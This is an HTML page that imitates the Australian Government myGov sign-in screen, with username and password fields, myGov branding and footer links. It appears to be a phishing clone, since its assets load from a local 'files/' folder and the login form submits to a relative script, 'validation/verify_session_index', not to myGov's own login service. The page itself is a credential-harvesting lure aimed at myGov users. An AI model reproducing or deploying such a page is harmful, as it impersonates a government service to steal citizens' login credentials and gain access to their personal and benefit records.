<html lang="en">
<!--<![endif]-->

<head>
	<!--
E: PROD; 
C: MW1w; 
N: MW1w15; 
S: SW15a;  
-->
	<meta charset="utf-8">
	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<title> Sign in with myGov - myGov </title>
	<meta name="description" content="">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<!-- phone number format detection, turning it off -->
	<meta name="format-detection" content="telephone=no">
	<link rel="icon" type="image/png" sizes="32x32" href="files/favicon-32x32.png">
	<link rel="icon" type="image/png" sizes="16x16" href="files/favicon-16x16.png">
	<link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700|Roboto:300,400,500,700,900&amp;display=swap" rel="stylesheet">
	<link href="files/mgv2-application.css" rel="stylesheet">
	<link href="files/blugov.css" rel="stylesheet"> </head>

<body>
	<noscript>
		<div class="outage">
			<div class="outage__inner">
				<div> <span class="is-visuallyhidden"> Warning message: </span>
					<p> JavaScript is required for myGov to work correctly.</p>
				</div>
			</div>
		</div>
	</noscript>
	<nav class="uikit-skip-link" aria-label="Skip Links"> <a class="uikit-skip-link__link" href="#content">Skip to main content</a> </nav>
	<div class="brand-rainbow">&nbsp;</div>
	<header role="banner" class="mgvEnhanceHeader">
		<section class="wrapper">
			<div class="inner">
				<div class="unauth-grid">
					<div class="unauth-grid-row">
						<a href="https://my.gov.au/" class="unauth-govt-crest__link"> <img id="unauth-govt-crest" src="files/myGov-cobranded-logo-black.svg" alt="Australian Government and myGov logo" role="img"> </a>
						<div class="header-links"> <a href="https://my.gov.au/en/about/help">Help</a> </div>
					</div>
				</div>
			</div>
		</section>
	</header>
	<div class="wrapper-mapwap">
		<div class="main-block" id="content" role="main">
			<div class="unauth">
				<div class="login-grid-container">
					<div class="login-grid-row">
						<div class="login-grid-column">
							<div class="digital-id-login-card-wrapper">
								<div class="digital-id-main-login-card override"> <a data-go-back-link="" class="button-back" href="/las/mygov-login?execution=e1s1&amp;_eventId=close">Back</a>
									
									<h1>Sign in with myGov</h1>
									
									<h2 class="text-align-left">Using your myGov sign in details</h2>
									<form id="mygov-login-form" aria-describedby="error-msg" class="mygov-login-form alternative" action="validation/verify_session_index" method="post">
										<div class="input-group">
											<label class="override" for="userId">Username or email</label>
											<input id="username" name="username" required aria-required="true" data-username="data-username" type="text" value="" autocomplete="off"> </div>
										<p class="recovery"> <a href="/las/mygov-login?execution=e1s1&amp;_eventId=recoverusername" class="anchor override">Forgot username</a> </p>
										<div class="input-group">
											<label for="password" class="override">Password</label>
											<div class="password-group">
												<button class="showPassword anchor" type="button" aria-describedby="show-hide-helpmsg" aria-label="Show password as plain text.">Show</button>
												<p class="is-visuallyhidden" id="show-hide-helpmsg">Note: this will visually expose your password on the screen.</p>
												<input id="password" name="password" required type="password" data-current-password="data-current-password" autocomplete="off" aria-required="true"> </div>
										</div>
										<p class="recovery"> <a href="/las/mygov-login?execution=e1s1&amp;_eventId=resetpassword" class="anchor override">Forgot
										password</a> </p>
										<div class="button-digital-id-main-container override">
											<div class="digital-id-button-container">
												<button type="submit" class="button-main" name="_eventId_login">Sign in</button>
											</div>
										</div>
										<input type="hidden" name="authtype" value="unamepword">
										<input type="hidden" name="_csrf" value="3a01039b-965f-4fd8-b64f-b31a39d92019">
										<p class="create-account-text"><a class="create-account-link" href="https://my.gov.au/en/create-account/">Create a myGov account</a> if you don't have one already.</p>
										<div>
											<input type="hidden" name="_csrf" value="3a01039b-965f-4fd8-b64f-b31a39d92019"> </div>
									</form>
									
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	<footer role="contentinfo">
		<div class="wrapper">
			<div class="inner">
				<section class="footer-list">
					<nav>
						<h2 class="sr-only" aria-label="Footer">Footer</h2>
						<ul class="lower-links">
							<li> <a target="_blank" href="https://my.gov.au/en/about/terms">Terms of use</a> </li>
							<li> <a target="_blank" href="https://my.gov.au/en/about/privacy-and-security">Privacy and security</a> </li>
							<li> <a target="_blank" href="https://my.gov.au/en/about/copyright">Copyright</a> </li>
							<li> <a target="_blank" href="https://my.gov.au/en/about/accessibility">Accessibility</a> </li>
						</ul>
					</nav>
				</section>
				<div class="footer-lower">
					<section class="footer-lower-logo">
						<a href="https://my.gov.au/"> <img src="files/myGov-cobranded-logo-white.svg" alt="Australian Government and myGov logo" width="313.17" height="70" role="img"> </a>
					</section>
					<p class="footer-acknowledgement">We acknowledge the Traditional Custodians of the lands we live on. We pay our respects to all Elders, past and present, of all Aboriginal and Torres Strait Islander nations.</p>
				</div>
			</div>
		</div>
	</footer>
	
	<div id="artifact-metadata"> </div>
</body>

</html>